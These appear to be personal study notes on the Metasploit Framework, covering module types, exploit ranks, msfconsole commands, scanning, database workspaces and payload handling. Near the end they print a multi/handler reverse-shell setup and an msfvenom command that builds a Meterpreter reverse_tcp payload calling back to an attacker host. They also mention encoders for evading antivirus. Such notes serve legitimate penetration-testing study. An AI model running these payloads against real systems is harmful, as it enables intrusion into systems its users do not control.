Introduction

Main Components

msfconsole
  • auxiliary
    • supporting modules
    • scanners, crawlers, fuzzers
  • encoders
    • encode exploit and payload to circumvent signature-based antivirus
  • evasion
    • evade antivirus software
  • exploits
    • exploits organized by target system
  • NOPs
    • No OPeration
    • do nothing for one cycle on Intel x86 CPUs
    • often used as padding to achieve consistent payload sizes
  • payloads
    • code that will run on the target system
    • categorized as
      • adapters: wrap single payloads to convert them into different formats
        • e.g. a normal single payload wrapped inside the PowerShell adapter becomes a single PowerShell command that executes the payload
      • singles: self-contained payloads that do not need to download an additional component
        • e.g. add user, launch notepad.exe …
      • stagers: set up the connection channel between Metasploit and the target system
      • stages: downloaded by the stager
  • post
    • useful during the final stage of a penetration test

msfconsole

to list modules of a given type (inside an exploit context, show payloads lists only the payloads compatible with that exploit)

exploit ... > show <payloads | auxiliary | exploits | ...>

information about a module

exploit ... > info

to search for specific exploits, auxiliary modules, etc.

search <search parameters>

Exploit ranks, by reliability

ranking    description
Excellent  will never crash the service; e.g. SQL injection, command execution, RFI, LFI; no typical memory-corruption exploits
Great      has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check
Good       has a default target and is the "common case" for this type of software
Normal     exploit is otherwise reliable, but depends on a specific version and can't or doesn't reliably autodetect
Average    exploit is generally unreliable or difficult to exploit
Low        exploit is nearly impossible to exploit, or has under a 50% success rate, for common platforms
Manual     unstable or difficult to exploit and basically a DoS; also used when the module has no use unless specifically configured

Working with Modules

select a module (enter its context)

use <path to module>

show the parameters that need to be set (in module context)

module ... > show options

set a parameter for the current module

set <parameter name> <value>

set a parameter globally, for all modules

setg <parameter name> <value>

leave the module context

back

run an exploit while in exploit context

exploit

run the exploit and background the session as soon as it opens

exploit -z

check whether the target is exploitable without actually exploiting it

check

Exploitation

Port scanning

list modules for scanning ports

search portscan
  • the port scanner modules require the following parameters to be set
    • concurrency: number of targets to be scanned simultaneously
    • ports: port range to be scanned
    • rhosts: target host or network to be scanned
    • threads: number of threads used simultaneously; more = faster

UDP service identification

  • scanner/discovery/udp_sweep
    • quickly identifies services running over UDP
    • not an extensive scan, but a quick way to identify services such as DNS or NetBIOS

SMB Scans

  • Metasploit has several auxiliary modules to scan for specific SMB services

Metasploit database

the PostgreSQL database has to be started and initialised before Metasploit can use it

systemctl start postgresql
msfdb init

the database allows you to manage workspaces, which isolate the data of different projects

msf6 > workspace # list available workspaces
msf6 > workspace -a <name> # add new workspace
msf6 > workspace -d <name> # delete a workspace
msf6 > workspace <name> # to switch to a workspace

using the database enables additional commands, e.g. db_nmap

help # to list commands

Exploitation

choose an exploit

use <path to exploit>

then, while in the exploit context, choose a payload that fits the exploit

show payloads
# to set the payload use
set payload <number>

Msfvenom

  • generates payloads
  • encoders
    • encode a payload into different formats
  • handlers
    • handle the incoming connections made by msfvenom payloads
    • handled automatically by the exploit module when an exploit is used
    • multi/handler supports all Metasploit payloads and can be used for Meterpreter as well as regular shells

example:

use exploit/multi/handler
set payload php/reverse_php
set LHOST ...
set LPORT ...
run

example: create a Meterpreter payload for a reverse shell

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf
Last modified 2023.10.25